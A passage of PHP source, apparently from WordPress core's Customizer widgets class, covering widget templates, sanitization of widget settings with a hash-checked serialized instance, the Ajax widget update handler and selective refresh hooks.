'widgetMovedDown' => __( 'Widget moved down' ),
'navigatePreview' => __( 'You can navigate to other pages on your site while using the Customizer to view and edit the widgets displayed on those pages.' ),
'someAreasShown' => $some_non_rendered_areas_messages,
'noAreasShown' => $no_areas_shown_message,
'reorderModeOn' => __( 'Reorder mode enabled' ),
'reorderModeOff' => __( 'Reorder mode closed' ),
'reorderLabelOn' => esc_attr__( 'Reorder widgets' ),
/* translators: %d: The number of widgets found. */
'widgetsFound' => __( 'Number of widgets found: %d' ),
'noWidgetsFound' => __( 'No widgets found.' ),
),
'tpl' => array(
'widgetReorderNav' => $widget_reorder_nav_tpl,
'moveWidgetArea' => $move_widget_area_tpl,
),
'selectiveRefreshableWidgets' => $this->get_selective_refreshable_widgets(),
);
foreach ( $settings['registeredWidgets'] as &$registered_widget ) {
unset( $registered_widget['callback'] ); // May not be JSON-serializable.
}
$wp_scripts->add_data(
'customize-widgets',
'data',
sprintf( 'var _wpCustomizeWidgetsSettings = %s;', wp_json_encode( $settings, JSON_HEX_TAG | JSON_UNESCAPED_SLASHES ) )
);
/*
* TODO: Update 'wp-customize-widgets' to not rely so much on things in
* 'customize-widgets'. This will let us skip most of the above and not
* enqueue 'customize-widgets' which saves bytes.
*/
if ( wp_use_widgets_block_editor() ) {
$block_editor_context = new WP_Block_Editor_Context(
array(
'name' => 'core/customize-widgets',
)
);
$editor_settings = get_block_editor_settings(
get_legacy_widget_block_editor_settings(),
$block_editor_context
);
wp_add_inline_script(
'wp-customize-widgets',
sprintf(
'wp.domReady( function() {
wp.customizeWidgets.initialize( "widgets-customizer", %s );
} );',
wp_json_encode( $editor_settings, JSON_HEX_TAG | JSON_UNESCAPED_SLASHES )
)
);
// Preload server-registered block schemas.
wp_add_inline_script(
'wp-blocks',
'wp.blocks.unstable__bootstrapServerSideBlockDefinitions(' . wp_json_encode( get_block_editor_server_block_settings(), JSON_HEX_TAG | JSON_UNESCAPED_SLASHES ) . ');'
);
// Preload server-registered block bindings sources.
$registered_sources = get_all_registered_block_bindings_sources();
if ( ! empty( $registered_sources ) ) {
$filtered_sources = array();
foreach ( $registered_sources as $source ) {
$filtered_sources[] = array(
'name' => $source->name,
'label' => $source->label,
'usesContext' => $source->uses_context,
);
}
$script = sprintf( 'for ( const source of %s ) { wp.blocks.registerBlockBindingsSource( source ); }', wp_json_encode( $filtered_sources, JSON_HEX_TAG | JSON_UNESCAPED_SLASHES ) );
wp_add_inline_script(
'wp-blocks',
$script
);
}
wp_add_inline_script(
'wp-blocks',
sprintf( 'wp.blocks.setCategories( %s );', wp_json_encode( get_block_categories( $block_editor_context ), JSON_HEX_TAG | JSON_UNESCAPED_SLASHES ) ),
'after'
);
wp_enqueue_script( 'wp-customize-widgets' );
wp_enqueue_style( 'wp-customize-widgets' );
/** This action is documented in edit-form-blocks.php */
do_action( 'enqueue_block_editor_assets' );
}
}
/**
* Renders the widget form control templates into the DOM.
*
* @since 3.9.0
*/
public function output_widget_control_templates() {
?>
<div id="widgets-left"><!-- compatibility with JS which looks for widget templates here -->
<div id="available-widgets">
<div class="customize-section-title">
<button class="customize-section-back" tabindex="-1">
<span class="screen-reader-text">
<?php
/* translators: Hidden accessibility text. */
_e( 'Back' );
?>
</span>
</button>
<h3>
<span class="customize-action">
<?php
$panel = $this->manager->get_panel( 'widgets' );
$panel_title = isset( $panel->title ) ? $panel->title : __( 'Widgets' );
/* translators: ▸ is the unicode right-pointing triangle. %s: Section title in the Customizer. */
printf( __( 'Customizing ▸ %s' ), esc_html( $panel_title ) );
?>
</span>
<?php _e( 'Add a Widget' ); ?>
</h3>
</div>
<div id="available-widgets-filter">
<label for="widgets-search">
<?php
/* translators: Hidden accessibility text. */
_e( 'Search Widgets' );
?>
</label>
<input type="text" id="widgets-search" aria-describedby="widgets-search-desc" />
<div class="search-icon" aria-hidden="true"></div>
<button type="button" class="clear-results"><span class="screen-reader-text">
<?php
/* translators: Hidden accessibility text. */
_e( 'Clear Results' );
?>
</span></button>
<p class="screen-reader-text" id="widgets-search-desc">
<?php
/* translators: Hidden accessibility text. */
_e( 'The search results will be updated as you type.' );
?>
</p>
</div>
<div id="available-widgets-list">
<?php foreach ( $this->get_available_widgets() as $available_widget ) : ?>
<div id="widget-tpl-<?php echo esc_attr( $available_widget['id'] ); ?>" data-widget-id="<?php echo esc_attr( $available_widget['id'] ); ?>" class="widget-tpl <?php echo esc_attr( $available_widget['id'] ); ?>" tabindex="0">
<?php echo $available_widget['control_tpl']; ?>
</div>
<?php endforeach; ?>
<p class="no-widgets-found-message"><?php _e( 'No widgets found.' ); ?></p>
</div><!-- #available-widgets-list -->
</div><!-- #available-widgets -->
</div><!-- #widgets-left -->
<?php
}
/**
* Calls admin_print_footer_scripts and admin_print_scripts hooks to
* allow custom scripts from plugins.
*
* @since 3.9.0
*/
public function print_footer_scripts() {
/** This action is documented in wp-admin/admin-footer.php */
do_action( 'admin_print_footer_scripts-widgets.php' ); // phpcs:ignore WordPress.NamingConventions.ValidHookName.UseUnderscores
/** This action is documented in wp-admin/admin-footer.php */
do_action( 'admin_print_footer_scripts' );
/** This action is documented in wp-admin/admin-footer.php */
do_action( 'admin_footer-widgets.php' ); // phpcs:ignore WordPress.NamingConventions.ValidHookName.UseUnderscores
}
/**
* Retrieves common arguments to supply when constructing a Customizer setting.
*
* @since 3.9.0
*
* @param string $id Widget setting ID.
* @param array $overrides Array of setting overrides.
* @return array Possibly modified setting arguments.
*/
public function get_setting_args( $id, $overrides = array() ) {
$args = array(
'type' => 'option',
'capability' => 'edit_theme_options',
'default' => array(),
);
if ( preg_match( $this->setting_id_patterns['sidebar_widgets'], $id, $matches ) ) {
$args['sanitize_callback'] = array( $this, 'sanitize_sidebar_widgets' );
$args['sanitize_js_callback'] = array( $this, 'sanitize_sidebar_widgets_js_instance' );
$args['transport'] = current_theme_supports( 'customize-selective-refresh-widgets' ) ? 'postMessage' : 'refresh';
} elseif ( preg_match( $this->setting_id_patterns['widget_instance'], $id, $matches ) ) {
$id_base = $matches['id_base'];
$args['sanitize_callback'] = function ( $value ) use ( $id_base ) {
return $this->sanitize_widget_instance( $value, $id_base );
};
$args['sanitize_js_callback'] = function ( $value ) use ( $id_base ) {
return $this->sanitize_widget_js_instance( $value, $id_base );
};
$args['transport'] = $this->is_widget_selective_refreshable( $matches['id_base'] ) ? 'postMessage' : 'refresh';
}
$args = array_merge( $args, $overrides );
/**
* Filters the common arguments supplied when constructing a Customizer setting.
*
* @since 3.9.0
*
* @see WP_Customize_Setting
*
* @param array $args Array of Customizer setting arguments.
* @param string $id Widget setting ID.
*/
return apply_filters( 'widget_customizer_setting_args', $args, $id );
}
/**
* Ensures sidebar widget arrays only ever contain widget IDS.
*
* Used as the 'sanitize_callback' for each $sidebars_widgets setting.
*
* @since 3.9.0
*
* @param string[] $widget_ids Array of widget IDs.
* @return string[] Array of sanitized widget IDs.
*/
public function sanitize_sidebar_widgets( $widget_ids ) {
$widget_ids = array_map( 'strval', (array) $widget_ids );
$sanitized_widget_ids = array();
foreach ( $widget_ids as $widget_id ) {
$sanitized_widget_ids[] = preg_replace( '/[^a-z0-9_\-]/', '', $widget_id );
}
return $sanitized_widget_ids;
}
/**
* Builds up an index of all available widgets for use in Backbone models.
*
* @since 3.9.0
*
* @global array $wp_registered_widgets
* @global array $wp_registered_widget_controls
*
* @see wp_list_widgets()
*
* @return array List of available widgets.
*/
public function get_available_widgets() {
static $available_widgets = array();
if ( ! empty( $available_widgets ) ) {
return $available_widgets;
}
global $wp_registered_widgets, $wp_registered_widget_controls;
require_once ABSPATH . 'wp-admin/includes/widgets.php'; // For next_widget_id_number().
$sort = $wp_registered_widgets;
usort( $sort, array( $this, '_sort_name_callback' ) );
$done = array();
foreach ( $sort as $widget ) {
if ( in_array( $widget['callback'], $done, true ) ) { // We already showed this multi-widget.
continue;
}
$sidebar = is_active_widget( $widget['callback'], $widget['id'], false, false );
$done[] = $widget['callback'];
if ( ! isset( $widget['params'][0] ) ) {
$widget['params'][0] = array();
}
$available_widget = $widget;
unset( $available_widget['callback'] ); // Not serializable to JSON.
$args = array(
'widget_id' => $widget['id'],
'widget_name' => $widget['name'],
'_display' => 'template',
);
$is_disabled = false;
$is_multi_widget = ( isset( $wp_registered_widget_controls[ $widget['id'] ]['id_base'] ) && isset( $widget['params'][0]['number'] ) );
if ( $is_multi_widget ) {
$id_base = $wp_registered_widget_controls[ $widget['id'] ]['id_base'];
$args['_temp_id'] = "$id_base-__i__";
$args['_multi_num'] = next_widget_id_number( $id_base );
$args['_add'] = 'multi';
} else {
$args['_add'] = 'single';
if ( $sidebar && 'wp_inactive_widgets' !== $sidebar ) {
$is_disabled = true;
}
$id_base = $widget['id'];
}
$list_widget_controls_args = wp_list_widget_controls_dynamic_sidebar(
array(
0 => $args,
1 => $widget['params'][0],
)
);
$control_tpl = $this->get_widget_control( $list_widget_controls_args );
// The properties here are mapped to the Backbone Widget model.
$available_widget = array_merge(
$available_widget,
array(
'temp_id' => isset( $args['_temp_id'] ) ? $args['_temp_id'] : null,
'is_multi' => $is_multi_widget,
'control_tpl' => $control_tpl,
'multi_number' => ( 'multi' === $args['_add'] ) ? $args['_multi_num'] : false,
'is_disabled' => $is_disabled,
'id_base' => $id_base,
'transport' => $this->is_widget_selective_refreshable( $id_base ) ? 'postMessage' : 'refresh',
'width' => $wp_registered_widget_controls[ $widget['id'] ]['width'],
'height' => $wp_registered_widget_controls[ $widget['id'] ]['height'],
'is_wide' => $this->is_wide_widget( $widget['id'] ),
)
);
$available_widgets[] = $available_widget;
}
return $available_widgets;
}
/**
* Naturally orders available widgets by name.
*
* @since 3.9.0
*
* @param array $widget_a The first widget to compare.
* @param array $widget_b The second widget to compare.
* @return int Reorder position for the current widget comparison.
*/
protected function _sort_name_callback( $widget_a, $widget_b ) {
return strnatcasecmp( $widget_a['name'], $widget_b['name'] );
}
/**
* Retrieves the widget control markup.
*
* @since 3.9.0
*
* @param array $args Widget control arguments.
* @return string Widget control form HTML markup.
*/
public function get_widget_control( $args ) {
$args[0]['before_form'] = '<div class="form">';
$args[0]['after_form'] = '</div><!-- .form -->';
$args[0]['before_widget_content'] = '<div class="widget-content">';
$args[0]['after_widget_content'] = '</div><!-- .widget-content -->';
ob_start();
wp_widget_control( ...$args );
$control_tpl = ob_get_clean();
return $control_tpl;
}
/**
* Retrieves the widget control markup parts.
*
* @since 4.4.0
*
* @param array $args Widget control arguments.
* @return array {
* @type string $control Markup for widget control wrapping form.
* @type string $content The contents of the widget form itself.
* }
*/
public function get_widget_control_parts( $args ) {
$args[0]['before_widget_content'] = '<div class="widget-content">';
$args[0]['after_widget_content'] = '</div><!-- .widget-content -->';
$control_markup = $this->get_widget_control( $args );
$content_start_pos = strpos( $control_markup, $args[0]['before_widget_content'] );
$content_end_pos = strrpos( $control_markup, $args[0]['after_widget_content'] );
$control = substr( $control_markup, 0, $content_start_pos + strlen( $args[0]['before_widget_content'] ) );
$control .= substr( $control_markup, $content_end_pos );
$content = trim(
substr(
$control_markup,
$content_start_pos + strlen( $args[0]['before_widget_content'] ),
$content_end_pos - $content_start_pos - strlen( $args[0]['before_widget_content'] )
)
);
return compact( 'control', 'content' );
}
/**
* Adds hooks for the Customizer preview.
*
* @since 3.9.0
*/
public function customize_preview_init() {
add_action( 'wp_enqueue_scripts', array( $this, 'customize_preview_enqueue' ) );
add_action( 'wp_print_styles', array( $this, 'print_preview_css' ), 1 );
add_action( 'wp_footer', array( $this, 'export_preview_data' ), 20 );
}
/**
* Refreshes the nonce for widget updates.
*
* @since 4.2.0
*
* @param array $nonces Array of nonces.
* @return array Array of nonces.
*/
public function refresh_nonces( $nonces ) {
$nonces['update-widget'] = wp_create_nonce( 'update-widget' );
return $nonces;
}
/**
* Tells the script loader to load the scripts and styles of custom blocks
* if the widgets block editor is enabled.
*
* @since 5.8.0
*
* @param bool $is_block_editor_screen Current decision about loading block assets.
* @return bool Filtered decision about loading block assets.
*/
public function should_load_block_editor_scripts_and_styles( $is_block_editor_screen ) {
if ( wp_use_widgets_block_editor() ) {
return true;
}
return $is_block_editor_screen;
}
/**
* When previewing, ensures the proper previewing widgets are used.
*
* Because wp_get_sidebars_widgets() gets called early at {@see 'init' } (via
* wp_convert_widget_settings()) and can set global variable `$_wp_sidebars_widgets`
* to the value of `get_option( 'sidebars_widgets' )` before the Customizer preview
* filter is added, it has to be reset after the filter has been added.
*
* @since 3.9.0
*
* @param array $sidebars_widgets List of widgets for the current sidebar.
* @return array
*/
public function preview_sidebars_widgets( $sidebars_widgets ) {
$sidebars_widgets = get_option( 'sidebars_widgets', array() );
unset( $sidebars_widgets['array_version'] );
return $sidebars_widgets;
}
/**
* Enqueues scripts for the Customizer preview.
*
* @since 3.9.0
*/
public function customize_preview_enqueue() {
wp_enqueue_script( 'customize-preview-widgets' );
}
/**
* Inserts default style for highlighted widget at early point so theme
* stylesheet can override.
*
* @since 3.9.0
*/
public function print_preview_css() {
?>
<style>
.widget-customizer-highlighted-widget {
outline: none;
-webkit-box-shadow: 0 0 2px rgba(30, 140, 190, 0.8);
box-shadow: 0 0 2px rgba(30, 140, 190, 0.8);
position: relative;
z-index: 1;
}
</style>
<?php
}
/**
* Communicates the sidebars that appeared on the page at the very end of the page,
* and at the very end of the wp_footer,
*
* @since 3.9.0
*
* @global array $wp_registered_sidebars
* @global array $wp_registered_widgets
*/
public function export_preview_data() {
global $wp_registered_sidebars, $wp_registered_widgets;
$switched_locale = switch_to_user_locale( get_current_user_id() );
$l10n = array(
'widgetTooltip' => __( 'Shift-click to edit this widget.' ),
);
if ( $switched_locale ) {
restore_previous_locale();
}
$rendered_sidebars = array_filter( $this->rendered_sidebars );
$rendered_widgets = array_filter( $this->rendered_widgets );
// Prepare Customizer settings to pass to JavaScript.
$settings = array(
'renderedSidebars' => array_fill_keys( array_keys( $rendered_sidebars ), true ),
'renderedWidgets' => array_fill_keys( array_keys( $rendered_widgets ), true ),
'registeredSidebars' => array_values( $wp_registered_sidebars ),
'registeredWidgets' => $wp_registered_widgets,
'l10n' => $l10n,
'selectiveRefreshableWidgets' => $this->get_selective_refreshable_widgets(),
);
foreach ( $settings['registeredWidgets'] as &$registered_widget ) {
unset( $registered_widget['callback'] ); // May not be JSON-serializable.
}
wp_print_inline_script_tag(
sprintf( 'var _wpWidgetCustomizerPreviewSettings = %s;', wp_json_encode( $settings, JSON_HEX_TAG | JSON_UNESCAPED_SLASHES ) ) . "\n//# sourceURL=" . rawurlencode( __METHOD__ )
);
}
/**
* Tracks the widgets that were rendered.
*
* @since 3.9.0
*
* @param array $widget Rendered widget to tally.
*/
public function tally_rendered_widgets( $widget ) {
$this->rendered_widgets[ $widget['id'] ] = true;
}
/**
* Determine if a widget is rendered on the page.
*
* @since 4.0.0
*
* @param string $widget_id Widget ID to check.
* @return bool Whether the widget is rendered.
*/
public function is_widget_rendered( $widget_id ) {
return ! empty( $this->rendered_widgets[ $widget_id ] );
}
/**
* Determines if a sidebar is rendered on the page.
*
* @since 4.0.0
*
* @param string $sidebar_id Sidebar ID to check.
* @return bool Whether the sidebar is rendered.
*/
public function is_sidebar_rendered( $sidebar_id ) {
return ! empty( $this->rendered_sidebars[ $sidebar_id ] );
}
/**
* Tallies the sidebars rendered via is_active_sidebar().
*
* Keep track of the times that is_active_sidebar() is called in the template,
* and assume that this means that the sidebar would be rendered on the template
* if there were widgets populating it.
*
* @since 3.9.0
*
* @param bool $is_active Whether the sidebar is active.
* @param string $sidebar_id Sidebar ID.
* @return bool Whether the sidebar is active.
*/
public function tally_sidebars_via_is_active_sidebar_calls( $is_active, $sidebar_id ) {
if ( is_registered_sidebar( $sidebar_id ) ) {
$this->rendered_sidebars[ $sidebar_id ] = true;
}
/*
* We may need to force this to true, and also force-true the value
* for 'dynamic_sidebar_has_widgets' if we want to ensure that there
* is an area to drop widgets into, if the sidebar is empty.
*/
return $is_active;
}
/**
* Tallies the sidebars rendered via dynamic_sidebar().
*
* Keep track of the times that dynamic_sidebar() is called in the template,
* and assume this means the sidebar would be rendered on the template if
* there were widgets populating it.
*
* @since 3.9.0
*
* @param bool $has_widgets Whether the current sidebar has widgets.
* @param string $sidebar_id Sidebar ID.
* @return bool Whether the current sidebar has widgets.
*/
public function tally_sidebars_via_dynamic_sidebar_calls( $has_widgets, $sidebar_id ) {
if ( is_registered_sidebar( $sidebar_id ) ) {
$this->rendered_sidebars[ $sidebar_id ] = true;
}
/*
* We may need to force this to true, and also force-true the value
* for 'is_active_sidebar' if we want to ensure there is an area to
* drop widgets into, if the sidebar is empty.
*/
return $has_widgets;
}
/**
* Retrieves MAC for a serialized widget instance string.
*
* Allows values posted back from JS to be rejected if any tampering of the
* data has occurred.
*
* @since 3.9.0
*
* @param string $serialized_instance Widget instance.
* @return string MAC for serialized widget instance.
*/
protected function get_instance_hash_key( $serialized_instance ) {
return wp_hash( $serialized_instance );
}
/**
* Sanitizes a widget instance.
*
* Unserialize the JS-instance for storing in the options. It's important that this filter
* only get applied to an instance *once*.
*
* @since 3.9.0
* @since 5.8.0 Added the `$id_base` parameter.
*
* @global WP_Widget_Factory $wp_widget_factory
*
* @param array $value Widget instance to sanitize.
* @param string $id_base Optional. Base of the ID of the widget being sanitized. Default null.
* @return array|void Sanitized widget instance.
*/
public function sanitize_widget_instance( $value, $id_base = null ) {
global $wp_widget_factory;
if ( array() === $value ) {
return $value;
}
if ( isset( $value['raw_instance'] ) && $id_base && wp_use_widgets_block_editor() ) {
$widget_object = $wp_widget_factory->get_widget_object( $id_base );
if ( ! empty( $widget_object->widget_options['show_instance_in_rest'] ) ) {
if ( 'block' === $id_base && ! current_user_can( 'unfiltered_html' ) ) {
/*
* The content of the 'block' widget is not filtered on the fly while editing.
* Filter the content here to prevent vulnerabilities.
*/
$value['raw_instance']['content'] = wp_kses_post( $value['raw_instance']['content'] );
}
return $value['raw_instance'];
}
}
if (
empty( $value['is_widget_customizer_js_value'] ) ||
empty( $value['instance_hash_key'] ) ||
empty( $value['encoded_serialized_instance'] )
) {
return;
}
$decoded = base64_decode( $value['encoded_serialized_instance'], true );
if ( false === $decoded ) {
return;
}
if ( ! hash_equals( $this->get_instance_hash_key( $decoded ), $value['instance_hash_key'] ) ) {
return;
}
$instance = unserialize( $decoded );
if ( false === $instance ) {
return;
}
return $instance;
}
/**
* Converts a widget instance into JSON-representable format.
*
* @since 3.9.0
* @since 5.8.0 Added the `$id_base` parameter.
*
* @global WP_Widget_Factory $wp_widget_factory
*
* @param array $value Widget instance to convert to JSON.
* @param string $id_base Optional. Base of the ID of the widget being sanitized. Default null.
* @return array JSON-converted widget instance.
*/
public function sanitize_widget_js_instance( $value, $id_base = null ) {
global $wp_widget_factory;
if ( empty( $value['is_widget_customizer_js_value'] ) ) {
$serialized = serialize( $value );
$js_value = array(
'encoded_serialized_instance' => base64_encode( $serialized ),
'title' => empty( $value['title'] ) ? '' : $value['title'],
'is_widget_customizer_js_value' => true,
'instance_hash_key' => $this->get_instance_hash_key( $serialized ),
);
if ( $id_base && wp_use_widgets_block_editor() ) {
$widget_object = $wp_widget_factory->get_widget_object( $id_base );
if ( ! empty( $widget_object->widget_options['show_instance_in_rest'] ) ) {
$js_value['raw_instance'] = (object) $value;
}
}
return $js_value;
}
return $value;
}
/**
* Strips out widget IDs for widgets which are no longer registered.
*
* One example where this might happen is when a plugin orphans a widget
* in a sidebar upon deactivation.
*
* @since 3.9.0
*
* @global array $wp_registered_widgets
*
* @param array $widget_ids List of widget IDs.
* @return array Parsed list of widget IDs.
*/
public function sanitize_sidebar_widgets_js_instance( $widget_ids ) {
global $wp_registered_widgets;
$widget_ids = array_values( array_intersect( $widget_ids, array_keys( $wp_registered_widgets ) ) );
return $widget_ids;
}
/**
* Finds and invokes the widget update and control callbacks.
*
* Requires that `$_POST` be populated with the instance data.
*
* @since 3.9.0
*
* @global array $wp_registered_widget_updates
* @global array $wp_registered_widget_controls
*
* @param string $widget_id Widget ID.
* @return array|WP_Error Array containing the updated widget information.
* A WP_Error object, otherwise.
*/
public function call_widget_update( $widget_id ) {
global $wp_registered_widget_updates, $wp_registered_widget_controls;
$setting_id = $this->get_setting_id( $widget_id );
/*
* Make sure that other setting changes have previewed since this widget
* may depend on them (e.g. Menus being present for Navigation Menu widget).
*/
if ( ! did_action( 'customize_preview_init' ) ) {
foreach ( $this->manager->settings() as $setting ) {
if ( $setting->id !== $setting_id ) {
$setting->preview();
}
}
}
$this->start_capturing_option_updates();
$parsed_id = $this->parse_widget_id( $widget_id );
$option_name = 'widget_' . $parsed_id['id_base'];
/*
* If a previously-sanitized instance is provided, populate the input vars
* with its values so that the widget update callback will read this instance
*/
$added_input_vars = array();
if ( ! empty( $_POST['sanitized_widget_setting'] ) ) {
$sanitized_widget_setting = json_decode( $this->get_post_value( 'sanitized_widget_setting' ), true );
if ( false === $sanitized_widget_setting ) {
$this->stop_capturing_option_updates();
return new WP_Error( 'widget_setting_malformed' );
}
$instance = $this->sanitize_widget_instance( $sanitized_widget_setting, $parsed_id['id_base'] );
if ( is_null( $instance ) ) {
$this->stop_capturing_option_updates();
return new WP_Error( 'widget_setting_unsanitized' );
}
if ( ! is_null( $parsed_id['number'] ) ) {
$value = array();
$value[ $parsed_id['number'] ] = $instance;
$key = 'widget-' . $parsed_id['id_base'];
$_REQUEST[ $key ] = wp_slash( $value );
$_POST[ $key ] = $_REQUEST[ $key ];
$added_input_vars[] = $key;
} else {
foreach ( $instance as $key => $value ) {
$_REQUEST[ $key ] = wp_slash( $value );
$_POST[ $key ] = $_REQUEST[ $key ];
$added_input_vars[] = $key;
}
}
}
// Invoke the widget update callback.
foreach ( (array) $wp_registered_widget_updates as $name => $control ) {
if ( $name === $parsed_id['id_base'] && is_callable( $control['callback'] ) ) {
ob_start();
call_user_func_array( $control['callback'], $control['params'] );
ob_end_clean();
break;
}
}
// Clean up any input vars that were manually added.
foreach ( $added_input_vars as $key ) {
unset( $_POST[ $key ] );
unset( $_REQUEST[ $key ] );
}
// Make sure the expected option was updated.
if ( 0 !== $this->count_captured_options() ) {
if ( $this->count_captured_options() > 1 ) {
$this->stop_capturing_option_updates();
return new WP_Error( 'widget_setting_too_many_options' );
}
$updated_option_name = key( $this->get_captured_options() );
if ( $updated_option_name !== $option_name ) {
$this->stop_capturing_option_updates();
return new WP_Error( 'widget_setting_unexpected_option' );
}
}
// Obtain the widget instance.
$option = $this->get_captured_option( $option_name );
if ( null !== $parsed_id['number'] ) {
$instance = $option[ $parsed_id['number'] ];
} else {
$instance = $option;
}
/*
* Override the incoming $_POST['customized'] for a newly-created widget's
* setting with the new $instance so that the preview filter currently
* in place from WP_Customize_Setting::preview() will use this value
* instead of the default widget instance value (an empty array).
*/
$this->manager->set_post_value( $setting_id, $this->sanitize_widget_js_instance( $instance, $parsed_id['id_base'] ) );
// Obtain the widget control with the updated instance in place.
ob_start();
$form = $wp_registered_widget_controls[ $widget_id ];
if ( $form ) {
call_user_func_array( $form['callback'], $form['params'] );
}
$form = ob_get_clean();
$this->stop_capturing_option_updates();
return compact( 'instance', 'form' );
}
/**
* Updates widget settings asynchronously.
*
* Allows the Customizer to update a widget using its form, but return the new
* instance info via Ajax instead of saving it to the options table.
*
* Most code here copied from wp_ajax_save_widget().
*
* @since 3.9.0
*
* @see wp_ajax_save_widget()
*/
public function wp_ajax_update_widget() {
if ( ! is_user_logged_in() ) {
wp_die( 0 );
}
check_ajax_referer( 'update-widget', 'nonce' );
if ( ! current_user_can( 'edit_theme_options' ) ) {
wp_die( -1 );
}
if ( empty( $_POST['widget-id'] ) ) {
wp_send_json_error( 'missing_widget-id' );
}
/** This action is documented in wp-admin/includes/ajax-actions.php */
do_action( 'load-widgets.php' ); // phpcs:ignore WordPress.NamingConventions.ValidHookName.UseUnderscores
/** This action is documented in wp-admin/includes/ajax-actions.php */
do_action( 'widgets.php' ); // phpcs:ignore WordPress.NamingConventions.ValidHookName.UseUnderscores
/** This action is documented in wp-admin/widgets.php */
do_action( 'sidebar_admin_setup' );
$widget_id = $this->get_post_value( 'widget-id' );
$parsed_id = $this->parse_widget_id( $widget_id );
$id_base = $parsed_id['id_base'];
$is_updating_widget_template = (
isset( $_POST[ 'widget-' . $id_base ] )
&&
is_array( $_POST[ 'widget-' . $id_base ] )
&&
preg_match( '/__i__|%i%/', key( $_POST[ 'widget-' . $id_base ] ) )
);
if ( $is_updating_widget_template ) {
wp_send_json_error( 'template_widget_not_updatable' );
}
$updated_widget = $this->call_widget_update( $widget_id ); // => {instance,form}
if ( is_wp_error( $updated_widget ) ) {
wp_send_json_error( $updated_widget->get_error_code() );
}
$form = $updated_widget['form'];
$instance = $this->sanitize_widget_js_instance( $updated_widget['instance'], $id_base );
wp_send_json_success( compact( 'form', 'instance' ) );
}
/*
* Selective Refresh Methods
*/
/**
* Filters arguments for dynamic widget partials.
*
* @since 4.5.0
*
* @param array|false $partial_args Partial arguments.
* @param string $partial_id Partial ID.
* @return array (Maybe) modified partial arguments.
*/
public function customize_dynamic_partial_args( $partial_args, $partial_id ) {
if ( ! current_theme_supports( 'customize-selective-refresh-widgets' ) ) {
return $partial_args;
}
if ( preg_match( '/^widget\[(?P<widget_id>.+)\]$/', $partial_id, $matches ) ) {
if ( false === $partial_args ) {
$partial_args = array();
}
$partial_args = array_merge(
$partial_args,
array(
'type' => 'widget',
'render_callback' => array( $this, 'render_widget_partial' ),
'container_inclusive' => true,
'settings' => array( $this->get_setting_id( $matches['widget_id'] ) ),
'capability' => 'edit_theme_options',
)
);
}
return $partial_args;
}
/**
* Adds hooks for selective refresh.
*
* @since 4.5.0
*/
public function selective_refresh_init() {
if ( ! current_theme_supports( 'customize-selective-refresh-widgets' ) ) {
return;
}
add_filter( 'dynamic_sidebar_params', array( $this, 'filter_dynamic_sidebar_params' ) );
add_filter( 'wp_kses_allowed_html', array( $this, 'filter_wp_kses_allowed_data_attributes' ) );
add_action( 'dynamic_sidebar_before', array( $this, 'start_dynamic_sidebar' ) );
add_action( 'dynamic_sidebar_after', array( $this, 'end_dynamic_sidebar' ) );
}
/**
* Inject selective refresh data attributes into widget container elements.
*
* @since 4.5.0
*
* @see WP_Customize_Nav_Menus::filter_wp_nav_menu_args()
*
* @param array $params {
* Dynamic sidebar params.
*
* @type array $args Sidebar args.
* @type array $widget_args Widget args.
* }
* @return array Params.
*/
public function filter_dynamic_sidebar_params( $params ) {
$sidebar_args = array_merge(
array(
'before_widget' => '',
'after_widget' => '',
),
$params[0]
);
// Skip widgets not in a registered sidebar or ones which lack a proper wrapper element to attach the data-* attributes to.
$matches = array();
$is_valid = (
isset( $sidebar_args['id'] )
&&
is_registered_sidebar( $sidebar_args['id'] )
&&
( isset( $this->current_dynamic_sidebar_id_stack[0] ) && $this->current_dynamic_sidebar_id_stack[0] === $sidebar_args['id'] )
&&
preg_match( '#^<(?P<tag_name>\w+)#', $sidebar_args['before_widget'], $matches )
);
if ( ! $is_valid ) {
return $params;
}
$this->before_widget_tags_seen[ $matches['tag_name'] ] = true;
$context = array(
'sidebar_id' => $sidebar_args['id'],
);
if ( isset( $this->context_sidebar_instance_number ) ) {
$context['sidebar_instance_number'] = $this->context_sidebar_instance_number;
} elseif ( isset( $sidebar_args['id'] ) && isset( $this->sidebar_instance_count[ $sidebar_args['id'] ] ) ) {
$context['sidebar_instance_number'] = $this->sidebar_instance_count[ $sidebar_args['id'] ];
}
$attributes = sprintf( ' data-customize-partial-id="%s"', esc_attr( 'widget[' . $sidebar_args['widget_id'] . ']' ) );
$attributes .= ' data-customize-partial-type="widget"';
$attributes .= sprintf( ' data-customize-partial-placement-context="%s"', esc_attr( wp_json_encode( $context ) ) );
$attributes .= sprintf( ' data-customize-widget-id="%s"', esc_attr( $sidebar_args['widget_id'] ) );
$sidebar_args['before_widget'] = preg_replace( '#^(<\w+)#', '$1 ' . $attributes, $sidebar_args['before_widget'] );
$params[0] = $sidebar_args;
return $params;
}
/**
* List of the tag names seen for before_widget strings.
*
* This is used in the {@see 'filter_wp_kses_allowed_html'} filter to ensure that the
* data-* attributes can be allowed.
*
* @since 4.5.0
* @var array
*/
protected $before_widget_tags_seen = array();
/**
* Ensures the HTML data-* attributes for selective refresh are allowed by kses.
*
* This is needed in case the `$before_widget` is run through wp_kses() when printed.
*
* @since 4.5.0
*
* @param array $allowed_html Allowed HTML.
* @return array (Maybe) modified allowed HTML.
*/
public function filter_wp_kses_allowed_data_attributes( $allowed_html ) {
foreach ( array_keys( $this->before_widget_tags_seen ) as $tag_name ) {
if ( ! isset( $allowed_html[ $tag_name ] ) ) {
$allowed_html[ $tag_name ] = array();
}
$allowed_html[ $tag_name ] = array_merge(
$allowed_html[ $tag_name ],
array_fill_keys(
array(
'data-customize-partial-id',
'data-customize-partial-type',
'data-customize-partial-placement-context',
'data-customize-partial-widget-id',
'data-customize-partial-options',
),
true
)
);
}
return $allowed_html;
}
/**
* Keep track of the number of times that dynamic_sidebar() was called for a given sidebar index.
*
* This helps facilitate the uncommon scenario where a single sidebar is rendered multiple times on a template.
*
* @since 4.5.0
* @var array
*/
protected $sidebar_instance_count = array();
/**
* The current request's sidebar_instance_number context.
*
* @since 4.5.0
* @var int|null
*/
protected $context_sidebar_instance_number;
/**
* Current sidebar ID being rendered.
*
* @since 4.5.0
* @var array
*/
protected $current_dynamic_sidebar_id_stack = array();
/**
* Begins keeping track of the current sidebar being rendered.
*
* Insert marker before widgets are rendered in a dynamic sidebar.
*
* @since 4.5.0
*
* @param int|string $index Index, name, or ID of the dynamic sidebar.
*/
public function start_dynamic_sidebar( $index ) {
array_unshift( $this->current_dynamic_sidebar_id_stack, $index );
if ( ! isset( $this->sidebar_instance_count[ $index ] ) ) {
$this->sidebar_instance_count[ $index ] = 0;
}
